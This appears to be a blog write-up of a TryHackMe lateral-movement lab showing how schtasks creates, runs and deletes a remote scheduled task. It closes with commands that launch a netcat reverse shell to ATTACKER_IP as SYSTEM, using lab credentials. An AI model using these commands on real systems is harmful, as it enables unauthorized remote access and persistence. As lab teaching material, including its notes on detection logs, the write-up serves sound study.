Spawn remote process with scheduled tasks


A common Windows feature abused by threat actors to move laterally and maintain persistence is scheduled tasks. Threat actors favour it because it is present on every Windows installation, needs no extra tooling, and is driven by a built-in binary (schtasks.exe) that blends in with legitimate administration.


[image; credit: mura]

This blog post demonstrates the technique using Task 4 of the Lateral Movement and Pivoting room on TryHackMe.

How to create a scheduled task on a remote host

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00

Command breakdown:

/s = the remote host on which to create the task. schtasks reaches the Task Scheduler service on that host over RPC, so the account you authenticate with needs administrative rights there.

/RU = the account the task runs as (defaults to the current user). "SYSTEM" gives the payload full local privileges on the target.

/create = create the task

/tn = task name ("THMtask1" here)

/tr = task to run (the command to execute)

/sc = schedule frequency: MINUTE, HOURLY, DAILY, ONCE, etc.

/sd = start date, the date on which the task is due to run

/st = start time, the time at which the task is due to run

/u = domain username used to authenticate to the remote host (DOMAIN\user)

/p = password for that user; prompted for if omitted

Because we can trigger the task manually, the /sd and /st values hardly matter in this scenario; a date in the past just ensures the scheduler never fires it on its own.

Manual task execution

schtasks /s TARGET /run /TN "THMtask1"

Like a good threat actor, we clean up after ourselves by deleting the task. Note that this only removes the task object: on a host where object auditing is enabled, the Security log keeps 4698 (task created) and 4699 (task deleted) events, and the Microsoft-Windows-TaskScheduler/Operational log keeps 106 (task registered) and 141 (task deleted), all of which record the task name, the creating account and the command in /tr.

schtasks /S TARGET /TN "THMtask1" /DELETE /F


Let's start by creating our payload with msfvenom.


After creating the payload we need a way to get it onto the host. In this scenario I have a set of credentials that gives me access to an SMB share, so I upload my reverse shell there.


Now that the reverse shell has been uploaded, I need to create the task. Because the task runs as a privileged account (SYSTEM) on a remote host, I have to supply credentials for an account with administrative rights there (please ignore the formatting; the TryHackMe AttackBox is painful to work with). In the commands below, replace TARGET with the remote host and ATTACKER_IP with the address of your listener, which must already be waiting on port 4443; the password is passed with /p:

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask69" /tr "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers /p EZpass4ever

schtasks /s TARGET /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers /p EZpass4ever